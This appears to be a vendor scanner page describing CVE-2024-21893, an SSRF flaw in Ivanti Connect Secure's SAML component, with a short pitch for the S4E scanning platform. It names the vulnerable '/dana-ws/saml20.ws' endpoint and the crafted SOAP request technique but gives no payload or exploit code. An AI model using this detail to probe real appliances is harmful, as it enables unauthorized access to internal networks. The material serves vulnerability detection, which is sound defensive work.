CVE-2024-21893 Scanner
Detects 'SSRF' vulnerability in Ivanti Connect Secure affects v. 9.x, 22.x.
Short Info
Level
High
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
2 months 4 weeks
Scan only one
Domain, IPv4, Subdomain
Toolbox
-
Ivanti Connect Secure is a widely used remote access solution that enables secure connections to corporate networks and resources. It is utilized by organizations and enterprises to facilitate remote work capabilities while maintaining robust security measures. The SAML component of Ivanti Connect Secure is integral for providing authentication and access control in remote access scenarios, ensuring secure connections for users accessing corporate resources from external locations.
The vulnerability detected in Ivanti Connect Secure is a Server Side Request Forgery (SSRF) flaw present in the SAML component. This vulnerability allows an attacker to manipulate server-side requests sent by the application, potentially accessing restricted resources without proper authentication. By exploiting SSRF, an attacker can bypass access controls and interact with internal systems or retrieve sensitive information accessible to the server.
The SSRF vulnerability is triggered by sending a crafted SOAP request to the '/dana-ws/saml20.ws' endpoint of Ivanti Connect Secure. The attacker can control the contents of the SOAP request, including the destination URI, allowing them to request access to internal resources or sensitive endpoints. Successful exploitation of this vulnerability can lead to unauthorized access to restricted resources and compromise the security of the affected system.
Exploiting this SSRF vulnerability can enable an attacker to bypass authentication controls and access sensitive internal resources, potentially leading to data exfiltration, privilege escalation, or further compromise of the network infrastructure. Attackers could leverage SSRF to interact with internal systems, retrieve confidential information, or launch subsequent attacks against other systems within the network.
By leveraging the security scanning capabilities of the S4E platform, you can proactively detect and mitigate critical vulnerabilities like SSRF in Ivanti Connect Secure. Join our platform to ensure the security of your remote access infrastructure and protect your organization from potential data breaches and unauthorized access attempts.
References
